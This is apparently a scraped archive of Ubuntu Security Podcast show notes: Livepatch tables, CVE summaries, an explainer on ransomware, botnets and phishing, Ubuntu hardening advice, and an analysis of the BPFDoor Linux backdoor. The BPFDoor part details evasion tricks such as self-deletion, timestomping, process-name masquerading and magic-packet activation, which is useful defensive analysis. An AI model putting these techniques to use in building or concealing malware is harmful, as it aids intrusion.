aws-hwe | — | — | — | 87.2 | — |
azure | — | 87.1 | — | 87.1 | — |
azure-4.15 | — | — | 87.1 | — | — |
azure-5.4 | — | — | 87.1 | — | — |
gcp | 87.1 | 87.1 | — | 87.1 | — |
gcp-4.15 | — | — | 87.1 | — | — |
gcp-5.4 | — | — | 87.1 | — | — |
generic-4.15 | — | — | 87.1 | 87.1 | — |
generic-4.4 | — | — | — | 87.1 | 87.1 |
generic-5.4 | — | 87.1 | 87.1 | — | — |
gke | 87.1 | 87.1 | — | — | — |
gke-4.15 | — | — | 87.1 | — | — |
gke-5.4 | — | — | 87.1 | — | — |
gkeop | — | 87.1 | — | — | — |
gkeop-5.4 | — | — | 87.1 | — | — |
ibm | 87.1 | 87.1 | — | — | — |
linux | 87.1 | — | — | — | — |
lowlatency | 87.1 | — | — | — | — |
lowlatency-4.15 | — | — | 87.1 | 87.1 | — |
lowlatency-4.4 | — | — | — | 87.1 | 87.1 |
lowlatency-5.4 | — | 87.1 | 87.1 | — | — |
oem | — | — | 87.1 | — | — |
canonical-livepatch status
cat /sys/devices/system/cpu/vulnerabilities/mmio_stale_data
Not affected
, Vulnerable
(no mitigation),
Vulnerable: Clear CPU buffers attempted, no microcode
or Mitigation: Clear CPU buffers
if have mitigation enabled and microcode to support
itmmio_stale_data=full # or 'full,nosmt' or 'off'
kgdb
c_rehash
- very similar to CVE-2022-1292 (Episode 159) - possible code
execution if running it against certificates with crafted file names -
unlikely anyone is doing this in practice, plus upstream say this is
deprecated and instead should just use openssl rehash
insteadHello listener! Welcome to another segment o’mine in the Ubuntu Security Podcast! It’s been a while, but I have returned to bring some real buzz into today’s episode! How, you might ask? The buzz will come from the buzzwords we will be exploring…cyber security buzzwords to be more specific. Let’s start by defining what a buzzword is, for those who might not know this term: a buzzword is a word - or a term - that, as the name suggests, is currently buzzing. It’s a word that is popular within the scope of its usage. Everyone says it all the time, and it seems like you can’t escape it. The most popular articles about topics in a specific field use it every other sentence, people put them in big, bold and shiny letters right there on the title of their scientific papers, and even your baby’s first words end up being that buzzword because they end up hearing it more than the eternal and classic infant buzz phrase “Say mama!”. A buzzword is, therefore, a fashionable word at a specific point in time. Every field has its own, and cyber security is not exempt from them. Today, I want to actually explore some of the cyber security buzzwords we have and actually try to demystify them, as buzzwords can become something much more absurd or grandiose than they actually are just because everyone is choosing to use them. I think we all remember the era of the super low-rise jeans and can agree (or maybe agree to disagree) that just because something is being used by everyone out there, it does not mean it deserves all the hype…of course that is my own opinion on the subject matter that is low-rise jeans. As for the buzzwords, the statement stands! So, let’s bring up some of these super duper amazingly popular buzzwords in to play here, let’s actually define what they are for the ones out there that might not be cyber-security wizards, and let’s remove the buzzing that these buzzwords might have brought into our minds, shall we?
Buzzword #1: ransomware. Aaah, ransomware. You see this simple and yet deadly word everywhere. “Defend yourself against ransomware!”, “Ransomware might be just around the corner!”, “No need to fear ransomware anymore!”. It was the dawn of 2017 when ransomware became a thing to people outside of the cyber security community because of the infamous WannaCry malware. That picture with a red pop-up window telling you that all of your files had been encrypted and could only be recovered after some type of crypto currency payment was made to the attackers was absolutely everywhere! And after that, the ransomware wave only got stronger, with new and improved types showing up all the time, an honorable mention being the Petya variants. Anyway, since WannaCry was such a big deal at the time, and people were so scared of it after it left behind its trail of mayhem and huge amounts of lost data, ransomware became THE word chosen by various cybersecurity companies to describe that which is your main enemy in the digital world, the supervillain in this installment of the cyber security movie series that is actually our real lives. All defense tools now implement some type of measure against ransomware, because if they don’t, you know that clients of said tool will ask “but what about defending against ransomware?”, because that, my friends, is the buzzword that comes to their minds. Like the word “computer virus” in the early 2000s. Computer viruses still exist, but you don’t see people freaking out about it anymore, because now we have the “antivirus”. Phew, problem solved, right? So no need to have this as a buzzword anymore. However, just like computer viruses existed before the 2000s and still exist to this day, ransomware also existed before WannaCry and much worse versions of it will continue to exist while there still are vulnerabilities and hackers out there, which is to say…probably forever. The only difference is, we now live in a time where people seem to care about it a little bit more, maybe because they are not implementing security measures to be safe against it, or at least they are not doing it very well. But I am getting ahead of myself here. Let’s first talk about what ransomware really is, which is actually something very simple to do: a ransomware is a malware, as a computer virus is also a malware. A malware is a ‘malicious software’, or, in other words, a software that executes in a computing device and that does things that the owner of the device might not want it to do, like…for example, encrypt all of your files and not allow you to access them. That is what ransomware does, in most cases. The main idea is, a ransomware will be a malicious software that will prevent you from accessing your files until you pay some amount of money to the malicious entity that was able to get that ransomware to run in your network devices in the first place…so, until you pay a ransom to the kidnapper of your data. Of course this only works if you have someone on the other side waiting to exchange the money for the key that will decrypt your files, or else, you could simply have a very destructive trojan, or worm, or whatever other malware that is combined with the file encrypting functionality in order for the malicious software itself to spread through the network before actually causing the data harm it does. The question now is, whatever is the ransomware-hybrid malware that targeted you and your network, the only way to recover the data you lost, the data as it was during the time of total encryption, is to pay the ransom. Should you? Cyber security professionals usually recommend against paying ransom, as it only shows hackers that they can continue launching ransomware attacks to get what they want. The correct way to avoid your files from being forever lost after your network has been infected by one of these nasty malwares is to recover data from the backup server you set up…you did set up a backup server to store the backup for all of your company data, right? I know, I know…not always it will be the case that people will be able to set backups, and then, recovering all that is lost might be a much more difficult task if you decide to not pay the ransom. But come on…we live at a time where cyber security should no longer be put in the benches, and you should be highly concerned about possible attacks, especially attacks related to the ever popular buzzword ransomware. Save some of your budget for backups, you won’t regret it.
Buzzword #2: botnets. ‘Botnet’ is an interesting buzzword because it opens the door to many other tech buzzwords that are in everyone’s minds out there right now…like crypto mining, for example. Why? Because you can use botnets to perform crypto mining…you can also use botnets to spread malware, including ransomware. Oh…and botnets…their participants usually include lots of IoT devices! BAM, another buzzword right there! Now would you look at that! Seems like instead of a buzzword, we actually have a buzzword magnet in our hands ladies and gentlemen. So…yes, maybe ‘botnet’ is not the hottest buzzword out there right now, but I decided to include it in the list because I feel like it is a disguised buzzword. What do I mean by disguised? It’s the word that is in the subtitle for an article named “CRYPTO MINING HACKER GANG CAUSES DAMAGES TO COMPANY X”, or the word that is implied in a video that is named “IoT DEVICE Y SECURITY VULNERABILITY ONCE AGAIN EXPOSED BY MASSIVE DENIAL OF SERVICE ATTACK”, or even the word that is a part of a title or a conversation about cyber security, cyber attacks and vulnerabilities, but it might not be the one in big bold flashy fonts, like it was the case for our dearest friend ransomware. But it all comes back to the botnets eventually. So what is a botnet? As the name suggests, it is a network of bots! Wooow, could I get a round of applause for that definition, please and thank you very much! When we think about a robot, we think about a technological humanoid that speaks in a digitalized voice and obeys commands without question, unless they are actually trying to take over the planet and overthrow human supremacy…but that is a topic for another podcast to maybe discuss. The point here is: what is a computer if not a robot? No, it does not possess humanoid form most of the time, but it does communicate with us through a digital screen and it will execute commands that the software it is running tells it to, this software being created and programmed by a human being. So…yes…robots are computers, computers are robots, or at least…fancy humanoid robots and even cute round cleaning robots need computers to exist and computers are the basis to create a robot. So when we say botnet, we are actually referring to a network of computers. A network of computers, or a group of computers, which are all performing some type of common activity, executing software with the same purpose… and unfortunately for us, in this case it is a malicious purpose. Botnets are created through the infection of computing devices. A hacker releases malware on the Internet and this malware is able to propagate, infecting various devices connected to our fairest of ladies, usually devices that are vulnerable to some type of specific vulnerability. So, yes, once again we have malwares being a problem and ruining our days…surprise, surprise. Once infected, the device becomes a robot, a “mindless” soldier in an army of many that will respond to a hacker, most likely the one that created the malware. It connects back to this hacker, usually sending some type of short and sweet - bitter sweet for us, that is - message to a command and control server, which we can see as an HQ, but is actually nothing more than an attacker controlled device. And then…it waits. It continuously calls home to indicate that it is a part of the malicious group of infected devices that are “at the hacker’s service”, and it expects to eventually receive a message that will contain instructions which will give it an attack target and an attack to launch on that target. The malware that is running on the infected device, our bot, will contain the code or will receive and process the code that will allow this attack to be carried out, and then we have a huge amount of possibilities that we can consider for this attack, one of them being: the bots could be instructed to send absurd amounts of data through the network to a specific target. The target device gets overwhelmed and the service it provides through the network can no longer be accessed by legitimate users because the device crashes. This is a denial of service attack, which is very hard to stop at the source, as you have thousands of sources, most of which the device owners don’t even have malicious intent. The devices got hacked and are secretly and mercilessly being used to the advantage of the attacker. Granted…the reason for the infection, the presence of the vulnerability that initially caused this could be the owner’s fault. Maybe they wouldn’t have been unwillingly attacking the server of their favorite website had they applied that patch that recently came out for a critical vulnerability, however, you can’t really call them the mastermind of it all when all they did was keep a vulnerable computer, can you? Anyway, I might leave that philosophical question for a later time…for now, another well known use for botnets is crypto mining. Infect, divide and profit! Why use your own computer and your own resources to mine crypto currency when you have hundreds of thousands of unpatched IoT devices at your disposal to mine for you? That’s what the hackers think…not me….just to be veeeery clear. A botnet can also be used to spread ransomware. The bots worry about creating other bots as well as infecting devices in their own local networks that might make a hacker profit from a ransomware attack. And it all ties in beautifully to create the most amazing of buzzword sentences: Phishing campaign allows for creation of ransomware botnet! Oh…wait…there is a buzzword in there we have yet to talk about…
Buzzword #3: phishing! Did you like how I introduced this one by just name-dropping it previously? Since I gave it such a direct introduction, let’s also give it a direct definition. Phishing is a type of social engineering attack where an attacker throws what we can only call as the equivalent to “bait” into the Internet “ocean” in hopes of hooking some “fish”, in their fishing rods. So…the “fish” are like the victims of the attack, if that wasn’t clear enough for you… Our situation therefore, is kind of like real fishing, but in a different context, because here we are looking at people getting fooled into clicking on links that will cause them to access malicious websites, and then share sensitive information like passwords and credit card numbers through that website, all because they get fooled into doing it by a very clever attacker which is using of their social engineering skills achieve this. They could also simply get fooled into responding directly to a well crafted message with sensitive information they wouldn’t even share with their own diaries! Or maybe just with their diaries, but not other people. The question which remains is: what is social engineering? To put it simply, a social engineer is someone that knows how to “hack” the human psyche. To put it not so simply, it is the art - can I call it that? - of manipulating other people into doing something they might not want to have done in the first place. So, every spy movie when you see the almighty main character get into a building they shouldn’t by fooling the guard and making them believe they actually work there because they are wearing a fancy suit and spilling out complex terms to a phone…well that is social engineering. The super spy plays the part and gives no time for the guard to think too much about whether they are actually a legitimate authorized person or not, because when the guard starts questioning it, they emphatically say something in the lines of “Oh my god…I am going to be late to my meeting and you do not want Mr. Whatever to hear about this’. Mr. Whatever is an actual big boss around the place and Mr. Guard worries he will get fired if he doesn’t comply immediately, so just this time, he skips the ID checking phase of the process to let super spy waltz into the building unscathed. His fear of getting fired was used against him in order to make him do something he wouldn’t do were he thinking clearly, not affected by emotion: skip a part of the identification process of a person wanting to access the building. When we talk about spy movies of course we have a much more interesting example than when we are talking about actual phishing campaigns, but the underlying idea is the same in both. The difference is, in phishing attacks, a hacker will usually send an e-mail or a text message to a bunch of random people with a message that will toy with their emotions somehow. They focus on quantity instead of quality because eventually someone is bound to be freaked out by the email they get saying that their bank account will be closed if they don’t immediately click the link in the message and change their password using the form provided. They click the link without paying attention to the website URL, which is not at all related to the one of their bank’s actual website, and are redirected to a webpage which looks exactly like the password changing page you would get had you accessed this legitimate bank website. They input their data, which is quickly sent to the attacker, because they are the actual entity controlling the device behind said website, and now, this attacker has the password to this person’s bank account. Fishing rod: fake email sent to thousands of people saying the bank will close accounts that don’t change their passwords. Bait: the human feeling of desperation one might get when thinking about having their bank account suddenly be inaccessible, caused by the wording and official looking appearance of the email message that was sent. Fish who bite on that bait: people who believe this message and don’t pay too much attention to the signs that indicate that it is fake. Most times, people who are not that tech savvy and don’t even know how it is possible that a fake website could have the same appearance as the one from the actual bank. If it looks like the bank webpage, it can only be the bank webpage…right? So…yes, I am unfortunately talking about all of the grandmas out there, which end up being a very common victim of these types of attacks. But do not get me wrong. I am not saying here that if you are not a grandma that you are unaffected by phishing attacks. Social engineering techniques go way beyond fear or desperation, and anyone can be a target should a hacker strike the correct emotions on this target. Remember a certain Nigerian prince who was asking for a small sum of money only to return 10 times this amount to you as soon as their investment worked? Greed can also be your downfall. So the main tip for those that are worried about falling for phishing scams is simple: if something looks like it is too good to be true, it probably is. Also…if something seems too crazy to be true, maybe ask trustworthy people related to the craziness in question if that message you are receiving is indeed legitimate. So…for our bank situation, call your bank manager! Have more than one information source and breathe before making any harsh decisions and clicking the link that will ask you for your credentials or for any kind of sensitive information for absolutely no reason! I mean…why do you need my credit card number if I am not actually buying anything? Think before you type! That is the best way to not be that sad struggling fish at the mercy of some hook.
Well friends, sadly, we have reached that point of the episode which will actually transform this into a series instead of leaving it as a single episode, since I am unable to write a small script. Oops, sorry about that! We will continue on this journey next week, where I will talk about some other interesting buzzwords you might have heard when out and about. No spoilers though, as it might ruin the fun of it! I await you all in the next episode of this series. For now, feel free to share any of your thoughts on this episode in any of our social media channels! I bid you all farewell and until next time! Bye!
More Intel CPU issues, including Hertzbleed and MMIO stale data, plus we cover security vulnerabilities and updates for ca-certificates, Varnish Cache, FFmpeg, Firefox, PHP and more.
64 unique CVEs addressed
This week we dig into some of the details of another recent Linux malware sample called Symbiote, plus we cover security updates for the Linux kernel, vim, FreeRDP, NTFS-3G and more.
82 unique CVEs addressed
release_agent
io_uring
kgdb
canonical-livepatch status
Kernel type | 22.04 | 20.04 | 18.04 | 16.04 | 14.04 |
---|---|---|---|---|---|
aws | — | 86.3 | 86.3 | 86.3 | — |
aws-5.4 | — | — | 86.3 | — | — |
aws-hwe | — | — | — | 86.3 | — |
azure | — | 86.3 | — | 86.3 | — |
azure-4.15 | — | — | 86.3 | — | — |
azure-5.4 | — | — | 86.3 | — | — |
gcp | 86.4 | 86.3 | — | 86.3 | — |
gcp-4.15 | — | — | 86.3 | — | — |
gcp-5.4 | — | — | 86.3 | — | — |
generic-4.15 | — | — | 86.3 | 86.3 | — |
generic-4.4 | — | — | — | 86.3 | 86.3 |
generic-5.4 | — | 86.3 | 86.3 | — | — |
gke | 86.4 | 86.3 | — | — | — |
gke-4.15 | — | — | 86.3 | — | — |
gke-5.4 | — | — | 86.3 | — | — |
gkeop | — | 86.3 | — | — | — |
gkeop-5.4 | — | — | 86.3 | — | — |
ibm | 86.4 | 86.3 | — | — | — |
ibm-5.4 | — | — | 86.3 | — | — |
linux | 86.4 | — | — | — | — |
lowlatency | 86.4 | — | — | — | — |
lowlatency-4.15 | — | — | 86.3 | 86.3 | — |
lowlatency-4.4 | — | — | — | 86.3 | 86.3 |
lowlatency-5.4 | — | 86.3 | 86.3 | — | — |
oem | — | — | 86.3 | — | — |
mount.cifs
via crafted command-line
arguments - used strcpy()
to copy the provided IP address after first
checking length - but did comparison using strnlen()
which returns the
max length even if the string is longer - so subsequent strcpy()
would
then overflowmount.cifs
when it spawns a
subshell for password inputLD_PRELOAD
to ‘infect’ binaries on systemtcpdump
etcThis week we cover security updates for dpkg, logrotate, GnuPG, CUPS, InfluxDB and more, plus we take a quick look at some open positions on the team - come join us!
31 unique CVEs addressed
ntfsck
tool failed to perform proper bounds checking on filesystem
metadata - if could trick a user into running it on an untrusted
filesystem image could then possibly get code execution
ntfs-3g-dev
package which is not installed by defaultio_uring
- an
unprivileged user can spam requests which would eventually overflow
counter and then could be used to trigger an OOB write -> controlled
memory corruption -> privesc
io_uring
found by this researcher -
https://seclists.org/oss-sec/2021/q2/127This week we take a look into BPFDoor, a newsworthy backdoor piece of malware which has been targeting Linux machines, plus we cover security updates for Bind, Vim, Firefox, PostgreSQL and more.
32 unique CVEs addressed
https://doublepulsar.com/bpfdoor-an-active-chinese-global-surveillance-tool-54b078f1a896
https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/
Malware that has been in the wild for a while (over 5 years)
Reported on by PwC in their Cyber Threats 2021: A year in Retrospect report
Stealthy - allows to backdoor a system for RCE but without opening any new network ports or firewall rules by piggy-backing on existing network facing applications
Uses BPF filter to watching incoming packets and activate accordingly
Earlier versions are on VT - with lots of other variants too
Even source code too - https://pastebin.com/kmmJuuQP
As I said - stealthy
In more detail:
/dev/shm/kdmtmpflush
and then forks to clean itself up
to alter timestamps (timestomp) to a specific timestamp (7:17pm
Thursday October 30th 2008)/bar/run/haldrund.pid
to prevent further copies of
itself from running/dev/shm/
ramdisk and then exits to leave the
forked copy running resident in memory and then use BPF filter to watch
for incoming traffic to activateDoesn’t appear to have any particular persistence mechanism but some
reports suggest use of crontab
or rc/init
scripts
By deleting itself from the ramdisk this avoids detection from filesystem
scanners (although processes running from since deleted binaries are a
suspicious sign themselves and can be easily detected since once the
binary is removed the kernel notes this in /proc/self/exe
for the
process)
Renames its argv[0]
so that it looks like other commonly found processes
like dbus-daemon
/ udevd
/ auditd
etc
Also wipes its environ
too to try and help hide it’s activities, however
this again is another suspicious activity and can easily be detected
(e.g. strings
on /proc/$PID/environ
will show as empty which is basically
never normally the case for normal processes)
BPF filter inspects either ICMP, TCP or UDP packets and then if it has a special magic value in the first couple bytes it passes into the main packet processing routine
bindshell masquerades its process name to look like postfix as well as
setting a specific environment too (including HISTFILE=/dev/null
)
Then attacker has full access to the machine (as the user)
Reasonably advanced malware
What is not clear is what is the initial compromise vector and then how to privesc from that to give privileges to load BPF filter on a raw socket
xscreensaver
but this vuln is specific to Solaris platformsWhy it is important to keep systems updated with latest patches etc.
Ubuntu get’s pwned again at Pwn2Own Vancouver 2022, plus we look at security updates for the Linux kernel, RSyslog, ClamAV, Apport and more.
57 unique CVEs addressed
This week we bring you part 2 of our look at the new Ubuntu 22.04 LTS release and what’s in it for security, plus we cover security updates for DPDK, OpenSSL, Cron, RSyslog, Curl and more.
37 unique CVEs addressed
c_rehash
script through
shell-metacharacters - but no privilege escalation so only get whatever
privileges the script is executing under (c_rehash
is used to create
symlinks named as the hashes of certs etc when importing a cert into a
cert store so it can then easily be looked up via it’s hash value as the
filename)syslog
user only)ChangeCipherSpec
messages in TLS 1.3 - remote client could
crash a server by sending multiple of theseiptables
command to configure firewall rules etc but they
will then be loaded into the kernel’s nft
backend rather than xtables
nft
to directly configure nft
backend which supports more advanced rule types-fanalyzer
$SRANDOM
vs $RANDOM
/dev/urandom
and hence is not
reproducible / deterministic - ie. is actually more truly randomMicrosoft’s Nimbuspwn sets the Linux security media ablaze but where there’s smoke there’s not always fire, plus we bring you the first part of a 2 part series looking at some of the security features in the latest Ubuntu 22.04 LTS release.
92 unique CVEs addressed
networkd-dispatcher
which could be used
to get RCE
systemd-network
user (since this user is the only one which can bind
to the right dbus name org.freedesktop.network1
)apt=/=apt-get
during package install /
upgrade so this sounds like a common scenario that would affect most
users (instead of say epmd which is the erlang port mapper daemon, so
unless you are running erland applications you would not be affected by
that)systemd-network
user - this is definitely not the case for standard Ubuntu - since apt
is
very clear to run them under the _apt
user account purposefully to
restrict their privilegesnetworkd-dispatcher
since
they are not able to be exploited in standard configurations they are not
a real threat to most usersnetworkd-dispatcher
but didn’t involve any downstream
distros - as suggested by Julian Andres Klode from the Ubuntu Foundations
team (and upstream apt maintainer) - perhaps Microsoft should have
pre-disclosed this issue to the linux-distros mailing list - if they had
done so this likely would have been assessed and clarified earlier so
that Microsoft could have more properly understood the extent of the
vulnerabilities which they discovered the internet could have avoided
another brief panic scenarioUbuntu 22.04 LTS (Jammy Jellyfish) is officially released 🎉 and so this week we take a quick look at the new features and enhancements, with a particular focus on security, plus we cover security updates for the Linux kernel, Firefox, Django, Git, Gzip and more.
58 unique CVEs addressed
release_agent
not properly restricted -> privescrelease_agent
not properly restricted -> privescThis week we bring you the TL;DL (too-long, didn’t listen 😉) version of Camila’s recent 4-part Ubuntu hardening series, plus we look at security updates for Twisted, rsync, the Linux kernel, DOSBox, Tomcat and more.
48 unique CVEs addressed
/proc
(e.g. /proc/self/mem
) - could then allow an application to get code
execution - added checks on file access to prevent thisHello listener! This is going to be a quick episode and so I will make a quick introduction for it. During our last four episodes we talked about how to harden our Ubuntu systems, making it more robust…and dare I say it? More secure! However, four episodes is quite a lot, and not everyone is willing to listen to several minutes of my awesome voice, so I am here today to fix that and give you an episode that is a summary, a “Too Long, Didn’t Listen” if you will, of those previous four episodes. So let’s get going because today is no day for delays, and let’s talk, shortly and succinctly, about things you can do to harden your Ubuntu system.
Let’s start with hardening measures you can apply to your system whilst installing it:
(1) Encrypt your disk. Input and output operations might take a little while longer to happen, but if your hardware can take it, that might not even be an issue. Do remember though that everytime the device is shutdown, when you turn it on, you will have to decrypt the disk before using the operating system, which in turn means: inputting a password to get things going. So maybe only do this if you have a system where this won’t be a hindrance. Oh, and don’t lose your password, or else, you’ll end up with a disk full of pretty, but uninterpretable, characters and no functional operating system at all!
(2) Create a swap partition or a swap file to get the most out of your RAM. Availability is also a cyber security concern you should have, and providing your system with some swap space not only buffs it by giving it more RAM memory to work with - even it if is only a wannabe RAM - but it also allows you, as a system administrator, to be better prepared to face memory issues that might come to haunt your system, since you can monitor your swap space usage and use this as reference to know if your system might be feeling a little bit overloaded. Avoiding unnecessary crashes just got a whole lot easier. Choo OOM manager! A side note, though: check your system requirements so that you setup swap in a way that fits your system’s needs, or else, instead of making your device work better, you will only make it work harder.
(3) Partition your system! Put /var and /home in different disk partitions and avoid all that log file backup or those kitty videos from flooding your disk space and forcing your critical processes to stop execution because there is no space left in the system. Ooops. Maybe we should also take some time to update the log backup script and to remind users that the server is no place to store videos…even if they are adorable. And while you are at it, maybe also add /tmp to its own partition. World writable /tmp is a well known attacker target and grounding it and sending it to the corner to think about its bad behavior might be a good way to avoid possible attacks. Especially considering that different partitions can be set to have different permissions.
(4) Strong passwords. This shouldn’t even be in this list because you already use strong passwords when setting up your users during install, right? What? I’m not nervous because I definitely need to change my password from ‘security2022’ to something a lot better, you are!
With an installed system, our hardening journey is far from over, as we now need to set everything up securely before getting our service and its related applications running. How to proceed?
(1) Ubuntu does not enable a password for the ‘root’ user for a reason, and so, recommendation number one is: just leave ‘root’ and its password alone. Leave it there hibernating with all of its amazing and yet destructive power over the system. No ‘root’ user password, no successful brute force attacks, not even through SSH. An attacker in a regular user shell is a lot less scary than an attacker in a ‘root’ shell. Use ‘sudo’ instead, and configure ‘sudo’ permissions for your users appropriately in the /etc/sudoers file. YOU get to CHOOSE what commands each user can run as the superuser, so take your time to set these up. Give each user the least they need to perform their tasks, and stay safe. I know…it’s amazing…you get to CONTROL what your users are allowed to do in your system. “What? Has this always existed?” Yes, my friend, yes it has, so it’s about time you start configuring it properly.
(2) Use SSH instead of Telnet for remote login, because you are NOT a caveman that requires your data to be transmitted over the network in plain text. Yes, cavemen knew not to use Telnet and they also knew that even when using SSH they had to properly configure it before using it, or else, not even encryption would save them. If you doubt me, go do your research…this is 100% historically accurate, my fingers are definitely not crossed behind my back as I say this. Disable root access through SSH, use SSH2 instead of SSH1, setup allowlists and denylists for users and IP addresses, and set a maximum number of login attempts were all of the basic things cavemen in our planet did when setting up their SSH servers whilst sitting around their very cozy and newly discovered fires. Plus, they also setup private key login for their SSH servers, not because they were too lazy to type in their passwords - …nooooo, they had passphrases for their keys - but instead because it is a well-known and trusted way to verify the identity of whoever is trying to connect to the server. Passwords by themselves sometimes just aren’t enough. So…if cavemen were able to discover fire AND properly set up their SSH servers…then it is more than your obligation to at least do the same, if not more. Oh, and don’t forget to properly set permissions in the ‘authorized_keys’ file…I mean…come on guys…properly setting permissions in a very important file in your OS is a lot easier than hunting, foraging, surviving in the menacing prehistoric Earth environments, and that’s why cavemen did it as well.
(3) Can we really call it hardening of the system if we don’t consider hardening of the one and only, the star of the show, the kernel itself? The ‘sysctl’ command in your Ubuntu system is there to attend to all of your kernel hardening needs, allowing you to define kernel configurations, but not requiring you to reboot the machine to get them to stick. With ‘sysctl’ you can do so many things that I wouldn’t be able to summarize it all here, and I am already in a pinch because I am very bad at making my scripts short, and I need to keep this one short. So, for now, I will give you a little taste of what ‘sysctl’ can do to get those curiosity juices flowing! Restrict users allowed to read kernel logs and block IP packet forwarding for devices that are not routers. Was I able to make you interested? Well, I know I wont get the answer to that, but what I do know is that both those measures I mentioned can already take you a long way when you think of hardening your system, and they are two amongst many available…sooo, get those fingers typing and those kernel options researched and you, my friend, are in the right path to get your system hardened!
(4) Setup a host based firewall. They are efficient in blocking unwanted network traffic, they can be configured to your host’s specific needs and they are portable, since, when the host migrates, its firewall goes with it. Plus, it’s very easy to set up, you can use the Ubuntu tool known as the Uncomplicated Firewall (‘ufw’) to help you, and it gets you started on protecting yourself against the harsh, harsh Internet ecosystem that lies out there. Oh, and don’t even try to argue with me and tell me about your network based firewall and how it already does the job for you, because I just discussed it in the long version of this series, so to make it short, I will say one simple word to get my point across once again: layers!
(5) Remember when we were talking about partitioning your disk/filesystem? Well, let’s kick that up a notch and configure each partition individually, setting permissions and defining usage configurations for each one of the different partitions in our disks. We are all unique in this huge world we live in, and so are our partitions. Treat them with the love, care and individuality that they deserve and they shall return all of your efforts in the form of a more secure system. If you have a network shared partition, for example, why not set the ’noexec’ option for this partition, and avoid executables to be run from an area in your device that could be considered untrustworthy at best and devastatingly dangerous at worst? Don’t trust users, I always say, specifically when they come for your files through the network. Another good option would be to set a partition as read-only, if it is a partition that requires no more permissions than this. The /etc/fstab file is the one you can go to in order to set all of these configurations, which will be applied at mount time, exactly during system boot.
(6) Don’t ignore your logs. Setup a nice logging system for your device. Use syslog or journal to do so, and yeah…sure…thank me later, I won’t complain if you do. But seriously though, how can you expect to maintain and troubleshoot a device if you don’t know what is happening with that device? And how do you expect to keep a system secure if you can’t maintain and troubleshoot it? Yes, logs can be annoying to look at and analyze sometimes, but that is why utilities such as ‘syslogd’ and ‘journald’ exist to help you search through those logs. Syslog even allows you to send all of your data to a centralized server, which can then focus exclusively on processing log data that it gets from various network devices. You have all of that goldmine of data at your feet and all you need to do now is use it. Ubuntu has the tools that allow you to do that, but it doesn’t have the will…that, my friend, needs to come from you. So to show how important it is to set up and use logs, I will end this suggestion with a quote, because everything that includes quotes is usually considered important, right? “Knowing yourself is the beginning of all wisdom” - Aristotle. There, now go get some logging setup.
Ok. Next step is installing your applications so that you can get your service up and running. I am not even going to go into detail about using secure software, setting up this software including security configurations, and using encryption when sending data through the network, because that is obvious enough, right? If not…then I am sorry to tell you, you might need to listen to the long version of this. I will go into detail though, not much, but a little bit (if you want ‘much’, go listen to parts 1, 2, 3 and 4), on what you can do after you set up your service, and on what you can do until forever to keep your hardened system from going soft on you. So let’s jump in.
(1) One or two network services per device!!! Don’t make your server a jack of all trades, because that is a recipe for a hack of all spaces. If you are going to use the network to expose your service, maybe incorporate it as a part of the service’s architecture as well. Have more than one device running server software which makes up a part of the entire provided service, and have those devices communicate with each other through the network. Different server applications in different devices will isolate each relevant component and avoid a complete meltdown of the service in general, in case something is compromised. Divide and conquer. It’s like we don’t say this enough.
(2) Close unused ports in your system and disable unnecessary services and daemons. By not doing so you are only increasing the attack surface for your system, meaning, you are giving more possibilities for an attacker on how to attack you. Less is more, and the bare minimum should be enough. Be sure new installs and new updates don’t open up ports you don’t want to be opened and don’t bring in new files, scripts or executables that might compromise you. Keep a continuous eye on everything that is running in the background. Just because you can’t see it, it does not mean it can’t be hacked.
(3) Check your file permissions and change them if necessary! Defaults were made to be overwritten and you don’t need 777 files lying around in your system anymore, do you? Know your resources and set permissions accordingly. Correctly setting up users and groups is implied here, especially considering that users and groups will define who can and can’t access a file in the system. Plus, disable the setuid and the setgid bit for executables that don’t need it. When researching for privilege escalation techniques in Linux, “Find setuid binaries in the system” is the first technique to show up, so that should be enough of a warning to you that an executable should only be allowed to run as another user in case it is extremely…and let me say that again with emphasis: EXTREMELY necessary, or else, it might just be another day, another root shell for some random attacker.
(4) Install some third party software to help you keep your system safe. “We are all in this together”, a quote from a song in a teen musical I am totally not ashamed to admit I watched too much when I was a bit younger, used to say, and that applies for the cyber security community. Software that can help you better the security in your devices is plenty out there, and here, today, I will mention a few of them that you can check out and possibly use in order to harden your Ubuntu OS even more. Obviously, since this is a summary, we are doing this the fast way, so let’s get listing: Fail2ban, Snort and Suricata for intrusion detection and prevention; the Google PAM package, which allows implementation of 2-factor-authentication for your Ubuntu users; ClamAV, for malware detection; the Mozilla TLS configuration generator, to help you securely generate configuration files for well known applications; and finally, AppArmor, or possibly SELinux, for Mandatory Access Control that will complement the Discretionary Access Control you already set up with your file permissions earlier.
To finish this all off, don’t forget to keep your packages up-to-date, to use shred instead of remove to get rid of files containing sensitive data in your system, and to continuously go back and reconsider all of the previously mentioned points, so that your system can securely keep up with changes that are being made around it. The world won’t stop spinning and technology won’t stop evolving, so your server cannot afford to not be maintained and updated on a regular basis, or else, all of your initial hardening will be for naught.
That is all for today friends, and I hope you enjoyed it. It was a quick one, but it was an episode made with love. Feel free to share your thoughts on any of our social media platforms and for now I bid you farewell and until next time! Bye!
It’s an off-by-one error in the podcast this week as we bring you part 4 of Camila’s 3-part Ubuntu hardening series, plus we look at security updates for Thunderbird, OpenVPN, Python, Paramiko and more.
47 unique CVEs addressed
urllib.parse
mishandled URLs with embedded newlines - possible to bypass
regular checks leading to possible URL/request injection etc-fuse-ld=gold
to gcc)Hello listener! Welcome back to our Ubuntu hardening journey in the Ubuntu Security Podcast. Hey! I know what you’re thinking: I can’t count. I said this would be a three part series…and well…here I am in a fourth episode talking about this again. You could also be thinking “Hey, you’ve got the wrong title there…what’s the new topic for this episode?”, and should this be any other situation, I might’ve said you are right to either one of these two assumptions because I can be a bit of a scatterbrain sometimes. But not this time! I am here today once again talking about Ubuntu hardening because, hey…cyber security is a continuous effort. Remember that? And you know what also is a continuous effort? Learning and becoming wiser, and in our journey to do so, it is very likely that we will make a few mistakes here and there, myself included. Ok, ok, I’ll stop rambling and saying pretty words to distract you from the real deal here: I might’ve made some mistakes…Ooops! I apologize. Because yes, I do know about cyber security, but I am definitely not the master of all when it comes to it. So, in the past three episodes there were some sentences here and there that might have been a little bit incorrect, and some other sentences that might have been forgotten to be said. BUT WORRY NOT! I am here today to fix this. I got a review on my script for the last three episodes made by another one of the security team members, and they gave me a lot of helpful feedback on what I said and on what I suggested to you all. Since I had already recorded the other episodes and my laziness spoke a little higher than my willingness to spend the day re-editing audio files, I decided to instead bring a new episode to you. Coincidentally, recording a part 4 to a previously established 3 part series really resonates with the vibe that 